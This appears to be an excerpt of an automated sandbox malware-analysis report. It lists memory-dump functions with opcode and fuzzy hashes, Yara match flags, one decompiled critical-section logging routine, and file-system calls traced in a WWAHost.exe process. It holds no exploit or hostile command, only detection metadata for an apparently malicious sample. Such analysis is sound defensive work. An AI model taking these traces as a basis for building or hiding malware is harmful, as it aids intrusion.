Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa2799e18f6dcbc4cf69e8e982ed773e356c7a3fce4a705ee3ccb6cfd8d9fb12
Instruction ID: 4de70caf0bd0a61225e037c0432bc06681df353d02e13bfd8f9934f12b8b69aa
Opcode Fuzzy Hash: fa2799e18f6dcbc4cf69e8e982ed773e356c7a3fce4a705ee3ccb6cfd8d9fb12
Instruction Fuzzy Hash: F0D0A931201201E2EE2D5B289C58B242696EB91BC1F38006CF31B9A9C0EFB1DCA2E44C

Uniqueness

Uniqueness Score: -1.00%

Function 017453CA, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 3dfd5945bbca610bd69d2d86c78c009dac426685b2d7ed641d032a2fb0bf4d30
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: B8E08232A407809BCF12EB88CA90F5EBBFAFB84B00F280048A0086F620C724AC00CB40

Uniqueness

Uniqueness Score: -1.00%

Function 016DAAB0, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 6e311f8f15be5c27d0979ea1e976056ea2185beebac6e09f35fefb513df9bd44
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 01D0E939752990CFD617CB5DC954B1577A4BB44B84FD50590E901CBB62E73CD945CA00

Uniqueness

Uniqueness Score: -1.00%

Function 016F35A1, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: 6044905bf81f4ea1b12dc1fbe26953e2da50cf4bbbd2f3e8d68c004db9235870
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: ECD0C9319512859AEF52AB54CA1C76C7BB2BB80318F58206D96460EB62C33A4A5AD705

Uniqueness

Uniqueness Score: -1.00%

Function 00417300, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da5701961cc246868de4ebfed9961dc5e9e873069a8ee2e581d4046a8ca5b9da
Instruction ID: ca0fc164988fc494382500ec622c03ca3eb5301fa6a1a482de3f28043ee78c0b
Opcode Fuzzy Hash: da5701961cc246868de4ebfed9961dc5e9e873069a8ee2e581d4046a8ca5b9da
Instruction Fuzzy Hash: 1EA0015BF59019015964AC9A78810B4E3A5D1A71FAEA032B7DE0CF3504A803D425019D

Uniqueness

Uniqueness Score: -1.00%

Function 016CDB40, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: da6f7651030ce8368b6019d61e2c120c822bff2ab18199d8a95aa71b7e459d84
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: C1C08C70281A01AAEB221F20CD01B103BA1BB10F01F4400A46300DA0F0EF78D801EA04

Uniqueness

Uniqueness Score: -1.00%

Function 0174A537, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: eac89d56ece90a7f067a0a5fff1e35a1aa852fbee719e1235d438483c06cc89d
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 10C01232080248BBCB126F81CC00F167B6AEBA4B60F008014BA080B5608632E970EA88

Uniqueness

Uniqueness Score: -1.00%

Function 016E3A1C, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: dc13f40d55c1e5ccf207da706db3a1c752761cd7faaec4a020f4b2b09c71b8c0
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: E0C08C32080248BBCB126E41DC00F017B6AE7A0B60F000020B6040B5608932EC60D98C

Uniqueness

Uniqueness Score: -1.00%

Function 016CAD30, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: e47f8cb3e0fcd6413b258b92732c47655b7b035fe7356e33b23d05445c941b97
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: BDC08C320C0248BBCB126A45DD00F117B6AE7A0B60F100020F6040A6618932E860D588

Uniqueness

Uniqueness Score: -1.00%

Function 016D76E2, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 88d010be59341f00a8dbe4b115b2785f389e7f5a0e7131df59cb3f1b32cdefd2
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 68C08C705821C05AEF2A570CCE24B307A90AB0860CF58029CAA01096A2D368A802C208

Uniqueness

Uniqueness Score: -1.00%

Function 016F36CC, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 11e02ff47853415af57063069ef76b869d757a9a511818b5120f1661de5fa7cd
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 3CC02B70151440FBDB151F30CD00F147394F700A21F64035C7320866F0DE289C00D50C

Uniqueness

Uniqueness Score: -1.00%

Function 016E7D50, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 8da300a216f193e6bb0cbad3bc6512cb0f85fc3c3afe1ebfdb7e12fb903ec865
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: A1B09236302941CFCE16DF18C484B1533E8FB44A40B8400D0E400CBA21D32AE8008900

Uniqueness

Uniqueness Score: -1.00%

Function 016F2ACB, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 5509931242e1a768b5d262436ef35d6ae1e4eb6787e2615a1f9a5bf4760b7b48
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 08B01232C10541CFCF02FF40CB10B197332FB00750F05449490012B930C329BC01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 01709950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0a60109981313c65292c2d0cc37c74f39ee0be2444770309d273f62674b15b0
Instruction ID: bf2ec4ce77c07081ffe38ce5c71720f7738c6df855359122269e3386e3fe8a52
Opcode Fuzzy Hash: a0a60109981313c65292c2d0cc37c74f39ee0be2444770309d273f62674b15b0
Instruction Fuzzy Hash: E19002A120541407D250699D88086074405A7D4342F51C421A2055555ECA698C517575

Uniqueness

Uniqueness Score: -1.00%

Function 017099D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46e9c40505f5065139c6f76aa230894daab38116e9c6a0efecdd50606079f4c9
Instruction ID: e3eb2950d71a75779d85c2c73548e91b8c1fc35833f539aad8812b47e4e7b548
Opcode Fuzzy Hash: 46e9c40505f5065139c6f76aa230894daab38116e9c6a0efecdd50606079f4c9
Instruction Fuzzy Hash: 3F9002A121501046D214659D84087064445A7E5241F51C422A2145554CC5698C617565

Uniqueness

Uniqueness Score: -1.00%

Function 0170B040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 028526ce65f9d0a7deebf8256cb44b104d50c5e2b9918f322007bb67708a71cf
Instruction ID: f69a9e5ee142543b7d0b2978588ba96ea54c03d2d86d73b636ca66267e459abb
Opcode Fuzzy Hash: 028526ce65f9d0a7deebf8256cb44b104d50c5e2b9918f322007bb67708a71cf
Instruction Fuzzy Hash: CE9002A1605150474650B59D88084069415B7E5341391C531A0445560CC6A88855B6A5

Uniqueness

Uniqueness Score: -1.00%

Function 01709820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8e24d0a4c9824c821e9dbac79046dc07bf3999afa2eb052da1a77c7ee342b34
Instruction ID: c7dd9329a64fa95aa57913fa6d73f4969408627aaa1cdd1ff673463ae2698381
Opcode Fuzzy Hash: e8e24d0a4c9824c821e9dbac79046dc07bf3999afa2eb052da1a77c7ee342b34
Instruction Fuzzy Hash: 8F90027124501406D251759D84086064409B7D4281F91C422A0415554EC6958A56BEA1

Uniqueness

Uniqueness Score: -1.00%

Function 017098A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 207d0a5581238281b0d93f3ad45787e67fee62b3bca4b3fed4122360700df0c1
Instruction ID: ecb01260bdb740b459623abca416cfe6f3ad9a2a1ed62e7ab22267d537ff06d3
Opcode Fuzzy Hash: 207d0a5581238281b0d93f3ad45787e67fee62b3bca4b3fed4122360700df0c1
Instruction Fuzzy Hash: 1090026130501406D212659D84186064409E7D5385F91C422E1415555DC6658953B572

Uniqueness

Uniqueness Score: -1.00%

Function 01709B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c86ea3b2616e2376b1eefc70914ac1185e2effc5ae687d9afae779d8a65815bf
Instruction ID: 6e7571552b4a3a086e2f1c4e4c133120902dbe4a1a4042e55256625d1110d6b6
Opcode Fuzzy Hash: c86ea3b2616e2376b1eefc70914ac1185e2effc5ae687d9afae779d8a65815bf
Instruction Fuzzy Hash: 3390026124501806D250759DC4187074406E7D4641F51C421A0015554DC65689657AF1

Uniqueness

Uniqueness Score: -1.00%

Function 0170A3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b69842a4986ea9a80c4683cc587d10ee82569563a52a70abad5e8e792f78ba4
Instruction ID: 6d57704c171629557f0922bca06861be9683bc92857029239afcb02f58c0cdc0
Opcode Fuzzy Hash: 0b69842a4986ea9a80c4683cc587d10ee82569563a52a70abad5e8e792f78ba4
Instruction Fuzzy Hash: 7290027120545006D250759DC44860B9405B7E4341F51C821E0416554CC6558856B661

Uniqueness

Uniqueness Score: -1.00%

Function 01709A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 955368275643542cdb33cb6ab88f4f66ddb2e651e4084269f628eaada1becaeb
Instruction ID: 5574ea26308d46c6e17523ad9dbaa29d1c410dbc69f25eca63dae46b3cc9ee6e
Opcode Fuzzy Hash: 955368275643542cdb33cb6ab88f4f66ddb2e651e4084269f628eaada1becaeb
Instruction Fuzzy Hash: 5290027120541406D210659D880C7474405A7D4342F51C421A5155555EC6A5C8917971

Uniqueness

Uniqueness Score: -1.00%

Function 01709A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d67de13da28ca32203f2b355455e1c80c03bb707aaa8967b7d6d373f16946c5
Instruction ID: af07a38ed27059a02fdf8317f9a1b12b4e6d504a8a8e38b6920c97e4ed896280
Opcode Fuzzy Hash: 2d67de13da28ca32203f2b355455e1c80c03bb707aaa8967b7d6d373f16946c5
Instruction Fuzzy Hash: 3090026120545446D250669D8808B0F8505A7E5242F91C429A4147554CC95588557B61

Uniqueness

Uniqueness Score: -1.00%

Function 01709560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5db707601bcb2772b99318d7e4baf9a22e5a2f9ee8fee97c85a3e3b55de28109
Instruction ID: 710145086170428c6ab66a1c9761b32167e0689553c80f6123cedba3b9bb1093
Opcode Fuzzy Hash: 5db707601bcb2772b99318d7e4baf9a22e5a2f9ee8fee97c85a3e3b55de28109
Instruction Fuzzy Hash: 85900265225010060255A99D460850B4845B7DA391391C425F1407590CC66188657761

Uniqueness

Uniqueness Score: -1.00%

Function 0170AD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 615c134ec22cc9e7a7b4041184301b6af273509454d088e73f476b7b36b19757
Instruction ID: c39fe99443075a059b48d78bf4b769c39be307d503c8b0402c44488b432ca5cb
Opcode Fuzzy Hash: 615c134ec22cc9e7a7b4041184301b6af273509454d088e73f476b7b36b19757
Instruction Fuzzy Hash: 82900271A09010169250759D88186468406B7E4781B55C421A0505554CC9948A5577E1

Uniqueness

Uniqueness Score: -1.00%

Function 01709520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 920533d71de057a9f731522b0ca7bc5a060b828af11a68e13d0739676587137c
Instruction ID: 0ba484b6bb241fb378612726c8ec52d0c8628b122afe9887d5336d7cbd1d713c
Opcode Fuzzy Hash: 920533d71de057a9f731522b0ca7bc5a060b828af11a68e13d0739676587137c
Instruction Fuzzy Hash: 509002E1205150964610A69DC408B0A8905A7E4241B51C426E1045560CC5658851B575

Uniqueness

Uniqueness Score: -1.00%

Function 017095F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e93b6613d3e790f0fd0107a978d759a7e6e5546d797456ceff01f669ad1958fd
Instruction ID: 34b23d5c89c06c8e89e78b21d6620f0f0c0d1f94878ec2db8c7e829e5410ed5e
Opcode Fuzzy Hash: e93b6613d3e790f0fd0107a978d759a7e6e5546d797456ceff01f669ad1958fd
Instruction Fuzzy Hash: 9190027120501806D214659D88086864405A7D4341F51C421A6015655ED6A588917571

Uniqueness

Uniqueness Score: -1.00%

Function 0170A770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41ec8f512a1bd85307acf1aa64cb937d725ab7cb3dee5abffcc8c827a2844332
Instruction ID: 2e66df3515f78bc65e70fe922df0e0ca307f249ce7db0b100cce87cde0a41e79
Opcode Fuzzy Hash: 41ec8f512a1bd85307acf1aa64cb937d725ab7cb3dee5abffcc8c827a2844332
Instruction Fuzzy Hash: ED90027520905446D610699D9808A874405A7D4345F51D821A041559CDC6948861B561

Uniqueness

Uniqueness Score: -1.00%

Function 01709770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1f6aa4b69397ec4709c7518d0fd531f479ec5698b5c014f99f211d5b7352dbf
Instruction ID: 00f45de6009e193b1a981114eca3455bb3a7ad5a3e06851324dfaacfe3405207
Opcode Fuzzy Hash: a1f6aa4b69397ec4709c7518d0fd531f479ec5698b5c014f99f211d5b7352dbf
Instruction Fuzzy Hash: C790026120905446D210699D940CA064405A7D4245F51D421A1055595DC6758851B571

Uniqueness

Uniqueness Score: -1.00%

Function 01709760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 745d9118748785b18c0abf84f79252e4ccbb7d07c52562e7db66f8cf618f1d80
Instruction ID: d2a5252370c91763c2e13399f1ecc169955b19fcc721d751cd4d230b014fc7ff
Opcode Fuzzy Hash: 745d9118748785b18c0abf84f79252e4ccbb7d07c52562e7db66f8cf618f1d80
Instruction Fuzzy Hash: DB90027120501407D210659D950C7074405A7D4241F51D821A0415558DD69688517561

Uniqueness

Uniqueness Score: -1.00%

Function 01709730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37169eb054f9bc8d1dc3604ec38a95236ec8a26a8643d683e52d9eb8091e327a
Instruction ID: 9fc85171ac4fc823d2ec877f857197660c3e9f98d5377a7c0abd331bc791118c
Opcode Fuzzy Hash: 37169eb054f9bc8d1dc3604ec38a95236ec8a26a8643d683e52d9eb8091e327a
Instruction Fuzzy Hash: 6490026160901406D250759D941C7064415A7D4241F51D421A0015554DC6998A557AE1

Uniqueness

Uniqueness Score: -1.00%

Function 0170A710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f37683fbe2e5420259eea41ad29112345175a5fab65bfeb33619c5089bd4f65
Instruction ID: fb7cd3cdbc7377f63b5e50168916a95d672ece326704fe5060f2ddd26e256d8f
Opcode Fuzzy Hash: 3f37683fbe2e5420259eea41ad29112345175a5fab65bfeb33619c5089bd4f65
Instruction Fuzzy Hash: 0F900271305010569610AADD9808A4A8505A7F4341B51D425A4005554CC59488617561

Uniqueness

Uniqueness Score: -1.00%

Function 01709FE0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c8c99d0886fe3031e3de59a920c23b42e5fa40934642e927ff962b6058affab
Instruction ID: e3d1fdd793c662e4eb560973cef2b0cb63aaebe4b53531fc1ef8ca0eead6b85a
Opcode Fuzzy Hash: 9c8c99d0886fe3031e3de59a920c23b42e5fa40934642e927ff962b6058affab
Instruction Fuzzy Hash: 1E90027131515406D220659DC4087064405A7D5241F51C821A0815558DC6D588917562

Uniqueness

Uniqueness Score: -1.00%

Function 01709650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7601d143118c06c34da19cdf00083d338206cdd0920557a78d4526274f884178
Instruction ID: 9d83736b3db1af1642cd4f1d5473c33f601c8d00834334fc6ed91d2d83e057ca
Opcode Fuzzy Hash: 7601d143118c06c34da19cdf00083d338206cdd0920557a78d4526274f884178
Instruction Fuzzy Hash: F790027120905846D250759D8408A464415A7D4345F51C421A0055694DD6658D55BAA1

Uniqueness

Uniqueness Score: -1.00%

Function 01709610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ceda97ad937b930554b174c34269889858ec5e0597ab4cc52891a719db9c584b
Instruction ID: c3e89322b88a3378aff600329182d51cabb491f7780d6fafc67419ef5b202b1c
Opcode Fuzzy Hash: ceda97ad937b930554b174c34269889858ec5e0597ab4cc52891a719db9c584b
Instruction Fuzzy Hash: FF90027160901806D260759D84187464405A7D4341F51C421A0015654DC7958A557AE1

Uniqueness

Uniqueness Score: -1.00%

Function 017096D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32e49b929939ba8cd37905d996ae981f2f8a24700c749e6b2062a75f59ac95b1
Instruction ID: 28b6f824be20550c7253292564c76c64f87bbf9951f913dca82ef28d389ce2fc
Opcode Fuzzy Hash: 32e49b929939ba8cd37905d996ae981f2f8a24700c749e6b2062a75f59ac95b1
Instruction Fuzzy Hash: 3090027120501846D210659D8408B464405A7E4341F51C426A0115654DC655C8517961

Uniqueness

Uniqueness Score: -1.00%

Function 01709670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 78f4eca81114f486ffdd9c18aa0108fccf5bb00a7a99d45a732a8b30eb07a051
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0175FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0175FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0170CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01755720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01755720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0175fdda
0x0175fde2
0x0175fde5
0x0175fdec
0x0175fdfa
0x0175fdff
0x0175fe0a
0x0175fe0f
0x0175fe17
0x0175fe1e
0x0175fe19
0x0175fe19
0x0175fe19
0x0175fe20
0x0175fe21
0x0175fe22
0x0175fe25
0x0175fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0175FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0175FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0175FE01

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: f5a0addcf65bdf68d7cfe8e79c734efd4cc58d1f8798f057b3d2d055b7b11b54
Instruction ID: b54a0ea3c8bdd8e9fff01c20f00a69f4399471eedfa64c5ab58ef569e1224f1e
Opcode Fuzzy Hash: f5a0addcf65bdf68d7cfe8e79c734efd4cc58d1f8798f057b3d2d055b7b11b54
Instruction Fuzzy Hash: 87F0C272200601BBE7611A45DC06F63BF9AEB44B30F240358FA28561D1DAA2B86097E0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: WWAHost.exe PID: 6992 Parent PID: 3424 WWAHost.exeCOMMON

Executed Functions

Function 02E49F30, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02E44B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02E44B87,007A002E,00000000,00000060,00000000,00000000), ref: 02E49F7D

Strings

.z`, xrefs: 02E49F6D, 02E49F78

Memory Dump Source

Source File: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 3a8f6ab2084a460089500dc1a27a10edbb655fd18ba80fcf910dec5e95a50325
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: B9F0B2B2250208ABCB08CF88DC94EEB77ADAF8C754F158248BA0D97240C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02E49FE0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02E44D42,5EB6522D,FFFFFFFF,02E44A01,?,?,02E44D42,?,02E44A01,FFFFFFFF,5EB6522D,02E44D42,?,00000000), ref: 02E4A025

Memory Dump Source

Source File: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
